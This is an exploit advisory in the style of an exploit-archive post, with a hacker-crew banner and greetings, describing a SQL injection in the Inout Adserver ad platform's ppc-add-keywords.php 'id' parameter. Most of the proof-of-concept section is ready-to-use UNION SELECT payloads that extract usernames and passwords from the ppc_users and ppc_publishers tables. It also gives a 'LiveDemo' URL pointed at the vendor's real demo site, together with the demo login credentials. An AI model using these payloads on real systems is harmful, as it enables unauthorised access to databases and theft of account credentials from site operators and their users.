# Inout Adserver (id) Remote SQL injection [_][-][X]
_ ___ _ ___ ___ ___ _____ __ ___ __ __ ___
| |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \
| ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /
|_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/
Red n'black i dress eagle on my chest.
It's good to be an ALBANIAN Keep my head up high for that flag i die.
Im proud to be an ALBANIAN
########################################################################
Author : boom3rang
Contact : boom3rang[at]live.com
Greetz : H!tm@N - KHG - cHs
R.I.P redc00de
------------------------------------------------------------------------
Affected software description
Software : Inout Adserver
Vendor : http://www.inoutscripts.com/products/adserver/
Price : Just $99.95
Version Vuln. : /
------------------------------------------------------------------------
Proof Of Concept!
--------------------
= NOTE!! =
########################################################################################
First you need to create an Advertiser account to the site, it's free, then you need "login" to execute this exploit!
########################################################################################
Dork: N/W
---------------------------------------------------------------------------------------
SQLi:
http://localhost/PATH/ppc-add-keywords.php?id= [ Exploit ]
---------------------------------------------------------------------------------------
Exploit:
1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--
1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_publishers--
---------------------------------------------------------------------------------------
Example:
http://localhost/PATH/ppc-add-keywords.php?id=1+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--
---------------------------------------------------------------------------------------
LiveDemo:
Advertiser Demo Login!
Username : advertiser
Password : advertiser
http://www.inoutscripts.com/demo/inout_adserver/ppc-add-keywords.php?id=348+union+all+select+concat(username,char(58),password),2,3,null+from+ppc_users--